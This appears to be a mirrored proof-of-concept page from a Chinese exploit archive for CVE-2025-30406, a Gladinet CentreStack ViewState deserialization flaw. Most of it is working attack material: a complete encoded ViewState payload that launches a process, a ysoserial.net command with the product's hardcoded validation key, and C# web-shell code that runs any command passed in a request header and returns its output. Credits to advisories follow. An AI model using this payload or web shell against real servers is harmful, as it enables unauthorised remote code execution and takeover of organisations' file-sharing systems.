关联漏洞
描述
Exploit for CVE-2025-30406
介绍
# Part1: Exploit
```powershell
λ CVE-2025-30406.exe rce.txt
__LASTFOCUS=&__VIEWSTATE=%2fwEytQYAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADXBDxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgDQogICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiIA0KICAgIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2bDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZT0ie3g6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lPSJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2bDQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2bIi9jIG1zcGFpbnQiPC9TeXN0ZW06U3RyaW5nPg0KICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KPC9SZXNvdXJjZURpY3Rpb25hcnk%2bCw%2b6OKTmIbKTjW1wQMhlIOL9OQNSS8Y3iATUxLBZnYed
```
Test on 16.1.10296.56315, download link:
>https://s3.amazonaws.com/gladinetsupport/16.1.10296.56315/gladinet/GCE10296.iso
ysoserial.net command:
```powershell
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile --path="/portal/loginpage.aspx" --apppath="/portal/" --validationalg="HMACSHA256" --validationkey="5496832242CC3228E292EEFFCDA089149D789E0C4D7C1A5D02BC542F7C6279BE9DD770C9EDD5D67C66B7E621411D3E57EA181BBF89FD21957DCDDFACFD926E16" -c "ExploitClass.cs;System.Web.dll;System.dll;" --islegacy
```
```c#
class E
{
public E()
{
System.Web.HttpContext context = System.Web.HttpContext.Current;
context.Server.ClearError();
context.Response.Clear();
try
{
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "cmd.exe";
string cmd = context.Request.Headers["cmd"];
process.StartInfo.Arguments = "/c " + cmd;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.UseShellExecute = false;
process.Start();
string output = process.StandardOutput.ReadToEnd();
context.Response.Write(output);
} catch (System.Exception) {}
context.Response.Flush();
context.Response.End();
}
}
```
# Part2: Credit
https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild
https://github.com/zcgonvh/CVE-2020-0688
https://x.com/_JohnHammond/status/1910997121639321866
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-30406.yaml
文件快照
[4.0K] /data/pocs/953d6122cef2d457627602fb10dcf1b79bae0f68
├── [4.0K] CVE-2025-30406
│ ├── [ 184] App.config
│ ├── [3.1K] CVE-2025-30406.csproj
│ ├── [ 424] CVE-2025-30406.csproj.user
│ ├── [4.0K] dlls
│ │ ├── [1.3M] Microsoft.PowerShell.Editor.dll
│ │ └── [5.6M] System.Management.Automation.dll
│ ├── [ 11K] Program.cs
│ ├── [4.0K] Properties
│ │ └── [1.2K] AssemblyInfo.cs
│ └── [ 686] TextFormattingRunPropertiesMarshal.cs
├── [1.1K] CVE-2025-30406.sln
├── [ 589] rce.txt
└── [3.1K] README.md
3 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。